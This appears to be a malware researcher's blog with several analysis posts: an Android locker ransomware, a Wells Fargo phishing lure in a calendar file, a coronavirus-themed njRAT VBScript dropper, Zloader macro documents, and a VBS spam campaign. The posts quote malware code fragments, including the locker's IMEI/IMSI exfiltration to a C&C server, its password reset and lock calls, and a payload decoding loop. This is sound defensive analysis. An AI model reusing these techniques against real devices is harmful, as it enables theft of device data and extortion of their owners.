Sunday, 17 May 2020

Android Locker targeting Russian Users

On 15th of May 2020, a malicious Android application was found hosted at the URL: hxxp://

This application has the capability to add a device administrator and use it to reset the password of the Android phone. Once the phone is locked, the application will demand a ransom from the user to unlock the phone.

In this blog, I will describe the functionality of this Android locker.

MD5 hash of the APK file: a67480f99005d99cdff2dc1e2002536c
Filename: install.apk
URL: hxxp://
Package name:

From the AndroidManifest.xml we can see that 4 receivers are present in this application:

Listen - handles DEVICE_ADMIN_ENABLED intent
TryDisable - handles trydisable intent.
Work - handles spwd intent
Boot - handles BOOT_COMPLETED intent

The MainActivity class is shown below.

In the MainActivity, it fetches the IMEI and IMSI values from the phone using the "phone" system service as shown below.

    Object localObject = (TelephonyManager)getSystemService("phone");
    paramBundle = ((TelephonyManager)localObject).getSubscriberId();
    String str = ((TelephonyManager)localObject).getDeviceId();

This data is sent to the C&C server in an HTTP GET request as shown below.

    new Request().execute(new String[] { "" + str + "&imsi=" + paramBundle + "&action=1" });

GET /chceimw.php?imei=000000000000000&imsi=XXXXX0000000000&action=1 HTTP/1.1
Connection: close
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Adding a new device administrator

The code section below will add a new device administrator:

    localObject = new ComponentName(this, Listen.class);
    Intent localIntent = new Intent("");
    localIntent.putExtra("", (Parcelable)localObject);
    localIntent.putExtra("", getString(2131034113));

Below is the message displayed on the phone when the user is asked to install a new Device Administrator.

The policy for the new device admin is set to the Listen class.

Once the device admin is added, the onEnabled() method in the Device admin class will be called as shown below.

The onEnabled() method will broadcast an intent with the name: "spwd" which will be handled by the Work Class (this receiver is defined in the AndroidManifest.xml file).

paramContext.sendBroadcast(new Intent("spwd"));

Resetting Password and Locking the Phone

Let's look at the Work class which handles the intent with the name: "spwd".

It performs the following operations.

1. Fetches the IMSI and IMEI values using the getSubscriberId() and getDeviceId() methods of the phone system service.

2. Generates a new random password as shown below:

String str = String.valueOf(new Random().nextInt(888868) + 111112);

3. Uses the system service. "device_policy" to reset the password and lock the phone as shown below.

    localDevicePolicyManager.resetPassword(str, 1);

4. Sends an HTTP GET request with the IMSI, IMEI and randomly generated password as shown below:

    new Request().execute(new String[] { "" + (String)localObject + "&imsi=" + paramIntent + "&data=" + str });

5. Once the password is successfully set, the onPasswordSucceeded() method in the Listen() class will be called as shown below.

    paramIntent = new Intent(paramContext, WebActivity.class);

This method will start the activity called WebActivity.

The onCreate() method in the Web Activity will create a webView and load the ransom message from the URL: hxxp:// as shown below.

  public void onCreate(Bundle paramBundle)
    this.webView = ((WebView)findViewById(2131099648));

The ransom message displayed on the Android phone is shown below.

The phone will immediately be locked by the ransomware. Once the user tries to unlock the phone with the old PIN, the above ransom message is displayed.

This message is asking the user to send 1000 roubles to the payment address: 4693 9575 8653 7180


Wednesday, 15 April 2020

Outlook Calendar File (ICS file format) used for Wells Fargo Phishing

Attackers are always trying to find ways to evade security detection mechanisms. Even for credential phishing attacks, attackers find ways to evade the URL detection mechanisms used in security products.

One such method is embedding URLs in different file formats such as PDF, MS Office files such as doc, xls and so on.

Today I found an instance of a phishing attack where the attackers embedded a malicious phishing URL inside an ICS file. ICS file is the Outlook calendar format and it corresponds to an entry on the calendar appointment.

MD5 hash of the ICS file: 0986e7cbdef080dada8dee9c55542c37

At the time of writing there are 0 detections on VT for this file.

Figure 1: 0 detections on VT.

The malicious URL is present inside the calendar appointment.

Below are the different stages in this attack.

Stage 1: Calendar invitation opened and displayed in MS Office Outlook.

Figure 2: ICS file opened in MS Office Outlook.

Stage 2: The URL is present inside the Calendar appointment.

Figure 3: Phishing URL present inside calendar appointment.

Sharepoint Phishing URL: hxxps://

Stage 3: Sharepoint site is used to host the phishing content as shown below.

Figure 4: Sharepoint page hosting the content and phishing link.

The contents of this page pretends to be from the Fraud Prevention Team of Wells Fargo that requires the user to click on a link to take further action.

Stage 4: When the user clicks on the link in the above page, it redirects to the URL: hxxps://

Contents of the page are shown below.

Figure 5: Wells Fargo phishing page.

This page requests several sensitive information from the user such as username, password, email address, 4 digit cards PIN and Account Number details.

Conclusion: Users should pay extra attention while opening Calendar invitations and security products should take essential measures to scan ICS files. As can be seen, there are 0 detections on VT for this file format even though it contains a live phishing URL.


Saturday, 11 April 2020

VBScript using Coronavirus theme to execute njRAT

Recently we have observed many samples in-the-wild using the coronavirus theme to spread different types of trojans and Remote Administration Tools (RATs).

I came across one such interesting sample today. It is a VBScript which drops and executes njRAT binary embedded in it.

SHA256 hash: 1e18414968c0317cc5fefc5f25de845eba5566fcb236b9e4bdd84f0a82902c30
Filename: Covid19.vbs

The encoded VBScript is as shown below.

This script has funny variable names which makes the code interesting to read as well :)

For example, the below code section:

        If (Covid = 0) Then
            Do Until ebula = Len(winter)
                ebula = ebula + 1
                coldflue = coldflue & ChrW(AscW(Mid(winter, ebula, 1)) - spring + Len(corrona))
        End If
        If (Covid = 0) Then
        End If

The coldflue variable contains the decoded VBScript which is shown below.

The Base64 encoded blob in this VBScript decodes to an njRAT binary which is then dropped to the system to the path: C:\Users\sasithar79\AppData\Roaming\Microsoft\Invisible Server Process\\covid19.exe and executed as shown below.

SHA256 hash of the decoded njRAT binary: 59ebc1d6ef4c1dcd1e69abf55e7ea166b29a3dd208f286699345583b992ff068

Indicators of Compromise

Network IOC

Connects to: and port 15152


Thursday, 9 April 2020

XLM Hidden Macrosheets used for Evasion

Recently we have observed an increase in the usage of XLM based macro files which use Excel 4.0 macros and hidden macrosheets by attackers. I think threat actors will start leveraging this format even more in the near future. The advantage of using this format for attacks is that they don't use standard VBA macros. Most of the open source OLE VBA tools don't have the capability to extract the macros from them.

On April 9th 2020, I started observing a lot of XLS samples in the wild which used XLM Excel 4.0 hidden macrosheets for performing malicious activities.

This blog is a quick writeup to capture more information about this ongoing campaign.

All the files followed the naming convention: <Person's Name Resume>.xls


Filename: James Johnson Resume.xls
MD5 hash: 18ddf82706bcc79d12d0033df6991271

Filename: William Smith Resume.xls
MD5 hash: 971dcb961e8a894ed395a007965c7408

Filename: Maria Hernandez Resume.xls
MD5 hash: f5cf86e2acd65772a078c73fbbb70429

Interestingly all these samples have a detection of 0 on VT at the time of writing this blog as shown below.

Now, let us look at the macro code.

For the purpose of analysis, we will check the XLS file with MD5 hash: f5cf86e2acd65772a078c73fbbb70429

The contents of the file look like shown below.

It uses Social engineering to ask the user to enable macros so that the content of the file can be viewed. Unlike regular macro based XLS files used in spam campaigns, this one does not have a VBA macro which can be extracted easily.

It uses hidden macrosheets which have to be unhidden manually as shown below.

The macro code itself can be accessed by opening these hidden macrosheets. This an Excel 4.0 macro and the code can be seen in different cells of the worksheet as shown below.

The macro upon execution will connect to the C2 server to download a DLL which will be loaded dynamically using rundll32 to continue the malicious activities.

The network connection and response are shown below:

From whois lookup, it can be seen that the callback domain: was registered on March 26th 2020.

I'll add more details of the campaign as they are discovered in this blog.

Indicators of Compromise

URLs hosting the Zloader DLL:


MD5 hashes of the XLM files:



Friday, 7 February 2020

Spam campaign targeting Australian Users [Feb 7th 2020]

On Feb 7th 2020, I saw a couple of emails targeted towards Australian users. The malware delivery method consisted of ZIP files containing malicious VBScript files sent as email attachments.

Below is a quick analysis of this attack chain:

An example of Malicious email:

Attachment Analysis:

ZIP MD5 hash: 03383063f3fbdb51d142d7f022d52858
MD5 hash: 6d12aa34c3aa515ea909aaf5b6567316
Filename: GXIBV5537344461902.vbs

The ZIP file contained a malicious VBScript with an unusually large size of 1.7MB. Usually in spam campaigns we see VBScripts of a smaller size.

The script also contains an interesting obfuscation method as shown below:

Once the VBScript is executed, it displays a Pop Up message for social engineering purposes as shown below:

Rest of the execution sequence is:

1. Delays the execution (look for High CPU Usage).

2. Drops a DLL with TXT extension in the %temp% directory path with the name: Wv.txt

Note: A filetype and file extension mismatch for a dropped file is a good indicator for malicious file detection.

3. Executes the dropped DLL file using rundll32 as shown below:

rundll32.exe C:\Users\<username>AppData\Local\Temp\<name>.txt,DllRegisterServer

4. Creates several directories with random names in the path: %appdata%\Roaming\

5. Copies the dropped DLL file to the path: %appdata%\Roaming\<random_folder_name> with a random name.

6. Injects malicious code in msiexec.exe process and further malicious activities are performed in the context of msiexec.exe

Network communication performed in the context of msiexec.exe process is shown below:

Network IOCs:

File IOCs:

ZIP File Attachments:


VBS files:



Dropped DLL Files:


The SSL certificates used by the callback domains  are issued by: Internet Widgits Pty Ltd

SSL Certificate Serial Numbers: